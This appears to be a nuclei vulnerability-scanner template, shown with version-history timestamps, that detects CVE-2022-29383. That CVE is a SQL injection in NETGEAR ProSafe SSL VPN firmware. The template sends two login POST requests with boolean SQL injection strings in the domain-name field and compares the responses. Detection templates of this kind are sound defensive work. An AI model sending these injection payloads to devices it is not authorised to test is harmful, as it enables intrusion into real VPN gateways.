nuclei-templates/cves/2022/CVE-2022-29383.yaml

44 lines
1.6 KiB
YAML
Raw Normal View History

2022-06-01 18:57:18 +00:00
id: CVE-2022-29383
info:
2022-06-04 09:23:06 +00:00
name: NETGEAR ProSafe SSL VPN firmware - SQL Injection
2022-06-01 18:57:18 +00:00
author: elitebaz
severity: critical
2022-06-04 09:23:06 +00:00
description: |
NETGEAR ProSafe SSL VPN multiple firmwares were discovered to contain a SQL injection vulnerability via USERDBDomains.Domainname at cgi-bin/platform.cgi.
2022-06-01 18:57:18 +00:00
reference:
2022-06-04 10:27:23 +00:00
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29383
2022-06-04 09:23:06 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-29383
2022-06-04 10:27:23 +00:00
- https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383
2022-06-01 18:57:18 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-29383
2022-06-04 10:30:25 +00:00
metadata:
verified: true
2022-06-04 09:23:06 +00:00
tags: cve,cve2022,sqli,netgear,router
2022-06-01 18:57:18 +00:00
requests:
2022-06-04 09:23:06 +00:00
- raw:
- |
POST /scgi-bin/platform.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=utf-8
2022-06-01 18:57:18 +00:00
2022-06-04 09:23:06 +00:00
thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5435'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd
2022-06-01 18:57:18 +00:00
2022-06-04 09:23:06 +00:00
- |
POST /scgi-bin/platform.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=utf-8
2022-06-01 18:57:18 +00:00
2022-06-04 09:23:06 +00:00
thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5434'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd
req-condition: true
matchers:
- type: dsl
dsl:
- contains(body_1, "User authentication Failed")
- contains(body_2, "User Login Failed for SSLVPN User.")
condition: and